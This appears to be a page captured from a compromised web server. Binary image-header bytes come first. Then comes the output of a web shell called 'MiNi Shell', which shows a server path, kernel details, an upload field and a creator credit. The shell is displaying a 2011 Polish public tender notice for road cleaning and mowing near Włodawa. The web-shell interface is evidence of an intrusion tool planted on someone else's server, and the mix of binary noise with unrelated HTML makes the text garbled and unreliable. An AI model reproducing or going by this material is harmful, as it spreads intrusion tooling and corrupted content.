JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20110304/73163-N-2011.html

<p class="kh_header"><b>Włodawa: Usługi utrzymania czystości i porządku w pasach drogowych dróg wojewódzkich Nr 812 i Nr 816</b><br>
<b>Numer ogłoszenia: 73163 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi utrzymania czystości i porządku w pasach drogowych dróg wojewódzkich Nr 812 i Nr 816.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na:

     Utrzymania czystości i porządku w pasach drogowych dróg wojewódzkich 
     Nr 812 i Nr 816

1. Zakres usług obejmuje:
    Zadanie Nr 1.
a)	czterokrotne oczyszczenie i zamiatanie jezdni drogi wojewódzkiej nr 816 obustronnie na szerokości  0,75 m od krawędzi (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska + drogi podporządkowane w granicach pasa drogowego od km 60+130 do km 62+460)  pow. 3 495 m2,
b)	pięciokrotne koszenie traw i chwastów z ich zgrabieniem i usunięciem oraz zgrabieniem i usunięciem liści w pasie drogowym drogi wojewódzkiej Nr 816 (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, ul. Nadbużańska od km 60+130 do km 63+230), pow. 9 267 m2,
c)	36 krotne (1 raz w tygodniu) zbieranie śmieci z pasa drogowego drogi wojewódzkiej Nr 816  (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, od km 60+130 do km 63+230 - 28 179 m2),
d)	czterokrotne oczyszczenie i zamiatanie chodników wzdłuż drogi wojewódzkiej Nr 816 (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, od km 60+130 do km 62+440 - 6 952 m2),
e)	jednokrotne oczyszczenie i zamiatanie chodnika wzdłuż drogi wojewódzkiej Nr 816 (ul. Nadbużańska, ul. Wesoła na terenie m. Orchówek od km 62+440        do km 63+230 - 1 690 m2),
f)	jednokrotne oczyszczenie i zamiatanie chodnika i ścieżki rowerowej przy drodze wojewódzkiej Nr 812 (od ul. Waligóry km 77+132 do m. Okuninka II 
      km 82+195 - 18 383 m2),
g)	72 krotne (2 razy w tygodniu) opróżnianie koszy ze śmieci - 43 szt. 
      (5 szt. o poj. 40 l, 38 szt. o poj. 60 l).  
    
Zadanie Nr 2.    
a)	czterokrotne oczyszczenie i zamiatanie jezdni drogi wojewódzkiej Nr 812 (skrzyżowanie typu rondo ulic Korolowska i Chełmska + dojazdy), (2 116 m2),
b)  czterokrotne koszenie traw i chwastów z ich zgrabieniem i usunięciem:
     - droga wojewódzka Nr 812 od km 74+150 do km 77+132 obustronnie (64 574 m2),
     - droga wojewódzka  Nr 812 od km 77+132 do km 82+195 strona lewa (21 700 m2),
     - droga wojewódzka Nr 816 od km 59+300 do km 60+120 obustronnie (10 444 m2),
c) 36 krotne (1 raz w tygodniu) zbieranie śmieci z pasa drogowego dróg 
     wojewódzkich:
     -  Nr 812 ul. Korolowska i ul. Chełmska od km 74+685 do km 77+132 (78 520 m2)
     - Nr 816 od km 59+300 do km 60+120, (12 464 m2)
d)  jednokrotne oczyszczenie i zamiatanie chodników i ścieżki rowerowej  położonych 
     wzdłuż drogi wojewódzkiej Nr 812 (od ul. Żołnierzy WiN km 74+780 do skrzyżowania z
     ul. Waligóry km 77+132 - 7 744 m2),
e)  jednokrotne oczyszczenie i zamiatanie chodnika i ścieżki rowerowej wzdłuż drogi
     wojewódzkiej Nr 816 w m. Suszno od km 59+606 do km 60+125, (2806 m2),
 f) 72 krotne (2 razy w tygodniu) opróżnianie koszy ze śmieci - 5 szt. o poj. 60 l.
2. Zamawiający zastrzega sobie prawo zmniejszenia ilości usług poprzez zmniejszenie
     krotności wykonania
3. Sprzątanie należy wykonywać w godzinach o najmniejszym natężeniu ruchu.
4. Zamiatanie powinno odbywać się w sposób mechaniczny przy użyciu zamiatarki
    ulicznej lub w przypadku braku możliwości użycia zamiatarki ręcznie przy użyciu
    szczotek i łopat.
5. Zebrane śmieci, zanieczyszczenia, zgrabione trawy, chwasty i liście 
    Wykonawca we własnym zakresie i na swój koszt wywiezie na składowisko
    odpadów lub w  inne dopuszczone przepisami prawa miejsce w celu  ich
    unieszkodliwienia lub odzysku. 

6. Wykonawca zabezpieczy we własnym zakresie i na swój koszt wszystkie
    niezbędne do realizacji zamówienia środki transportowe, sprzęt i materiały.
7.  Warunki realizacji zamówienia:
a)  decyzję o konieczności wykonywania poszczególnych usług objętych zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich  we Włodawie.
b)	wzywanie do pracy zespołów roboczych Wykonawcy odbywać się będzie pisemnie przez upoważnionego pracownika Zamawiającego (nie dotyczy opróżniania koszy ze śmieci, które należy opróżniać bez wezwania 2 razy w tygodniu - poniedziałek i piątek i zbierania śmieci, które należy zbierać raz tygodniu - środa ).
8.   Warunki zapłaty:
      a)  fakturowanie wykonanych usług będzie się odbywało nie częściej niż raz              w miesiącu.
      b)  podstawą wyliczenia wartości fakturowanych usług będzie iloczyn ceny jednostkowej -  stawka za wykonanie usługi (zgodnie z ofertą) i ilości wykonanych usług w miesiącu rozliczeniowym;
c)	zamówienie będzie realizowane maksymalnie do cen umownych - zgodnie              z cenami ofert wybranego (-ych) Wykonawcy (-ców) - za wykonanie poszczególnych zadań. 
9.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych). Szacunkowa wartość zamówienia - 120650,00 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania uprawnień do wykonywania
    określonej działalności Wykonawca winien wykazać się posiadaniem ważnego
    dokumentu uprawniającego do prowadzenie działalności w zakresie zbierania i
     transportu odpadów,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem
    technicznym Wykonawca winien dysponować niżej wymienionymi jednostkami
    sprzętowymi i transportowymi
1.	Szczotka mechaniczna	szt. 1
2.	Kosiarka spalinowa do trawników    szt. 2
3.	Kosa spalinowa na wysięgniku   szt. 2
2. 	Ciągnik z przyczepą lub samochód ciężarowy szt. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów, które należy dołączyć w celu
     potwierdzenia spełniania warunków udziału w postępowaniu  Wykonawca obowiązany
     jest dołączyć do oferty:
1)	Ofertę przetargową (z ceną brutto, netto i z podatkiem VAT) 
      wraz z załącznikiem do oferty kosztorys ofertowy       2)  Zgodę/umowę na przyjęcie zebranych odpadów na składowisko odpadów.
3)	Podpisany wzór umowy 
4)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy dołączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych;
5)	W przypadku podpisania oferty i innych dokumentów  przez osobę/osoby,  które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:
1. Zmianie wynagrodzenia w przypadku zmiany stawek podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60
w pokoju nr 2, w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2011 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60  pokój nr 15 (sekretariat)
Otwarcie ofert 14/03/2011, godz.09:10, pokój Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem na nr 82 572 17 93; 572 41 62 lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się  z Wykonawcami:
1)	W sprawach technicznych - Krystyna Kowalewska (82 572 19 52)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk (82 572 16 35), Eugeniusz Kiewczykowski (82 572 16 35)
Ponieważ wartość przedmiotowego zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, odwołanie przysługuje, zgodnie z art. 180 ust. 2 ustawy Pzp, wyłącznie wobec czynności:
1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
3) odrzucenia oferty odwołującego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	czterokrotne oczyszczenie i zamiatanie jezdni drogi wojewódzkiej nr 816 obustronnie na szerokości  0,75 m od krawędzi (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska + drogi podporządkowane w granicach pasa drogowego od km 60+130 do km 62+460)  pow. 3 495 m2,
b)	pięciokrotne koszenie traw i chwastów z ich zgrabieniem i usunięciem oraz zgrabieniem i usunięciem liści w pasie drogowym drogi wojewódzkiej Nr 816 (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, ul. Nadbużańska od km 60+130 do km 63+230), pow. 9 267 m2,
c)	36 krotne (1 raz w tygodniu) zbieranie śmieci z pasa drogowego drogi wojewódzkiej Nr 816  (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, od km 60+130 do km 63+230 - 28 179 m2),
d)	czterokrotne oczyszczenie i zamiatanie chodników wzdłuż drogi wojewódzkiej Nr 816 (Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska, od km 60+130 do km 62+440 - 6 952 m2),
e)	jednokrotne oczyszczenie i zamiatanie chodnika wzdłuż drogi wojewódzkiej Nr 816 (ul. Nadbużańska, ul. Wesoła na terenie m. Orchówek od km 62+440        do km 63+230 - 1 690 m2),
f)	jednokrotne oczyszczenie i zamiatanie chodnika i ścieżki rowerowej przy drodze wojewódzkiej Nr 812 (od ul. Waligóry km 77+132 do m. Okuninka II 
      km 82+195 - 18 383 m2),
g)	72 krotne (2 razy w tygodniu) opróżnianie koszy ze śmieci - 43 szt. 
      (5 szt. o poj. 40 l, 38 szt. o poj. 60 l). Zamawiający zastrzega sobie prawo zmniejszenia ilości usług poprzez zmniejszenie
     krotności wykonania
  Szacunkowa wartość zadania - 55600,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	czterokrotne oczyszczenie i zamiatanie jezdni drogi wojewódzkiej Nr 812 (skrzyżowanie typu rondo ulic Korolowska i Chełmska + dojazdy), (2 116 m2),
b)  czterokrotne koszenie traw i chwastów z ich zgrabieniem i usunięciem:
     - droga wojewódzka Nr 812 od km 74+150 do km 77+132 obustronnie (64 574 m2),
     - droga wojewódzka  Nr 812 od km 77+132 do km 82+195 strona lewa (21 700 m2),
     - droga wojewódzka Nr 816 od km 59+300 do km 60+120 obustronnie (10 444 m2),
c) 36 krotne (1 raz w tygodniu) zbieranie śmieci z pasa drogowego dróg 
     wojewódzkich:
     -  Nr 812 ul. Korolowska i ul. Chełmska od km 74+685 do km 77+132 (78 520 m2)
     - Nr 816 od km 59+300 do km 60+120, (12 464 m2)
d)  jednokrotne oczyszczenie i zamiatanie chodników i ścieżki rowerowej  położonych 
     wzdłuż drogi wojewódzkiej Nr 812 (od ul. Żołnierzy WiN km 74+780 do skrzyżowania z
     ul. Waligóry km 77+132 - 7 744 m2),
e)  jednokrotne oczyszczenie i zamiatanie chodnika i ścieżki rowerowej wzdłuż drogi
     wojewódzkiej Nr 816 w m. Suszno od km 59+606 do km 60+125, (2806 m2),
 f) 72 krotne (2 razy w tygodniu) opróżnianie koszy ze śmieci - 5 szt. o poj. 60 l.
2. Zamawiający zastrzega sobie prawo zmniejszenia ilości usług poprzez zmniejszenie krotności wykonania. Szacunkowa wartość zadania - 65050,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com